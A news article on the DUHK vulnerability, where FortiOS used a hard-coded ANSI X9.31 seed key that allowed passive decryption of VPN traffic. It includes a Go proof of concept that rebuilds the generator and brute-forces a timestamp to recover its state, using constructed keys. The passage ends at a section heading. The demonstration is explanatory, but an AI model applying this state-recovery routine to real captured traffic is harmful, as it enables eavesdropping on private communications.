Vulnerable RNG implementation enables decryption of FortiOS VPN traffic
Several researchers, including US cryptographer Matthew Green, have found vulnerable implementations of the ANSI X9.31 random number generator. Among them is the one in the FortiOS operating system from manufacturer Fortinet.
The researchers present their findings in a paper and, ironically enough, on a dedicated site with its own logo and name. Green has also published a blog post of his own. In it he explains that RNGs are used in cryptography to generate random numbers. X9.31, which the US government approved through its FIPS program until 2016, derives its output from a changing state value combined with a fixed key. It was shown as early as 1998 that this is a weakness if an attacker learns that key.
By examining a large number of implementations of the RNG, the researchers found that FortiGate devices, among others, use a hard-coded key, also called the seed key. An attacker can extract it from the relevant firmware and use it to attack VPN and TLS traffic. For example, a passive attacker who can observe the network traffic can decrypt it after brute-forcing a timestamp with 2^24 attempts, which takes about four minutes on an ordinary PC.
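To make the mechanics concrete, here is an added example in Go, written for this article and not code from the DUHK researchers or from Fortinet. It builds the X9.31 generator on the standard library's AES (per call: I = E_K(DT), R = E_K(I xor V), V' = E_K(R xor I)) and then runs the attack the passage describes: with the hard-coded key, a known part of the date/time vector and two observed output blocks, it brute-forces the unknown part of the timestamp, recovers the generator state and predicts the next output. The layout of the date/time vector (12 known bytes followed by a guessed 32-bit field), the assumption that consecutive output blocks are produced under the same date/time value, and all keys, seeds and prefixes are constructed for the demonstration; none of them is the FortiOS layout or Fortinet's key.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/binary"
	"fmt"
)

// X931 is ANSI X9.31 instantiated with AES-128: a fixed key K and a changing
// state V, as the article describes. Per call, with DT the date/time vector:
//   I = E_K(DT);  R = E_K(I xor V);  V' = E_K(R xor I).
type X931 struct {
	blk cipher.Block
	v   [16]byte
}

func NewX931(key, seed []byte) *X931 {
	blk, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	g := &X931{blk: blk}
	copy(g.v[:], seed)
	return g
}

// encXor writes E_K(a xor b) into dst; every X9.31 step has this shape.
func encXor(blk cipher.Block, dst, a, b []byte) {
	var t [16]byte
	for k := range t {
		t[k] = a[k] ^ b[k]
	}
	blk.Encrypt(dst, t[:])
}

// Next emits one 16-byte output block for dt and advances the state V.
func (g *X931) Next(dt []byte) []byte {
	var i [16]byte
	r := make([]byte, 16)
	g.blk.Encrypt(i[:], dt)
	encXor(g.blk, r, i[:], g.v[:])
	encXor(g.blk, g.v[:], r, i[:])
	return r
}

// makeDT is this example's assumed DT layout (not the FortiOS one): 12 bytes
// the attacker already knows from the capture, then a 32-bit field to guess.
func makeDT(dst, known []byte, unknown uint32) {
	copy(dst[:12], known)
	binary.BigEndian.PutUint32(dst[12:], unknown)
}

type Recovered struct {
	DTGuess uint32   // the guessed DT field that reproduced r2
	VBefore [16]byte // state V before r1 was produced: D_K(r1) xor I
	Gen     *X931    // a generator synchronised with the victim after r2
}

// RecoverState is the DUHK-style attack: K is known (pulled from firmware),
// as is part of DT; r1, r2 are two consecutive observed outputs (assumed here
// to share one DT). A guess fixes I = E_K(DT), hence V1 = E_K(r1 xor I), and
// is confirmed when E_K(I xor V1) == r2. 24 unknown bits = the 2^24 guesses.
func RecoverState(key, known, r1, r2 []byte, bits uint) (Recovered, bool) {
	g := NewX931(key, nil)
	var dt, i, dr1, v1, pred [16]byte
	g.blk.Decrypt(dr1[:], r1) // D_K(r1) = I xor V0, independent of the guess
	for guess, limit := uint32(0), uint32(1)<<bits; guess < limit; guess++ {
		makeDT(dt[:], known, guess)
		g.blk.Encrypt(i[:], dt[:])
		encXor(g.blk, v1[:], r1, i[:])      // candidate state after r1
		encXor(g.blk, pred[:], i[:], v1[:]) // candidate r2
		if !bytes.Equal(pred[:], r2) {
			continue
		}
		rec := Recovered{DTGuess: guess, Gen: g}
		for k := range rec.VBefore {
			rec.VBefore[k] = dr1[k] ^ i[k]
		}
		encXor(g.blk, g.v[:], r2, i[:]) // victim's state after r2
		return rec, true
	}
	return Recovered{}, false
}

func main() {
	// Constructed values for the demonstration; none of them are Fortinet's.
	key := []byte("constructed-key!")  // stands in for the hard-coded key
	seed := []byte("secret-seed-val!") // the victim's initial state V
	known := []byte("known-ts-pfx")    // DT bytes the attacker can see
	victim := NewX931(key, seed)
	var dt [16]byte
	makeDT(dt[:], known, 0x9A3B2C) // low 24 bits: what the attacker must guess
	r1, r2 := victim.Next(dt[:]), victim.Next(dt[:]) // e.g. nonces on the wire
	rec, ok := RecoverState(key, known, r1, r2, 24)
	fmt.Printf("match: %v, DT field 0x%06x, prior state == seed: %v\n", ok, rec.DTGuess, bytes.Equal(rec.VBefore[:], seed))
	fmt.Printf("next output predicted: %v\n", ok && bytes.Equal(rec.Gen.Next(dt[:]), victim.Next(dt[:])))
}
```

Run as is, the program reports that the guess matched, that the recovered prior state equals the victim's seed, and that the attacker's copy of the generator produces the victim's next block. The decisive input is the key: with a per-device secret key the same search finds no match, which is exactly the property the descriptions of the algorithm never spelled out.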
Based on an internet scan, the researchers estimate that about 25,000 devices from the manufacturer running FortiOS versions 4.3.0 to 4.3.18 are affected. The manufacturer released a security update in November of last year. Although these are older devices, the authors of the paper say the numbers show that they are still in use.
Because the RNG had been deprecated since 2011 and was removed from the FIPS list in January 2016, the impact of the discovery appears manageable, as many manufacturers have since released updates. The published attack, dubbed DUHK, is "the result of the failure of the federal cryptography standardization process," according to the researchers: none of the descriptions of the algorithm, for instance, state that the seed key must not be discoverable by an attacker. There is reportedly no indication that the vulnerability, tracked as CVE-2016-8492, is being actively exploited.
Other potentially vulnerable implementations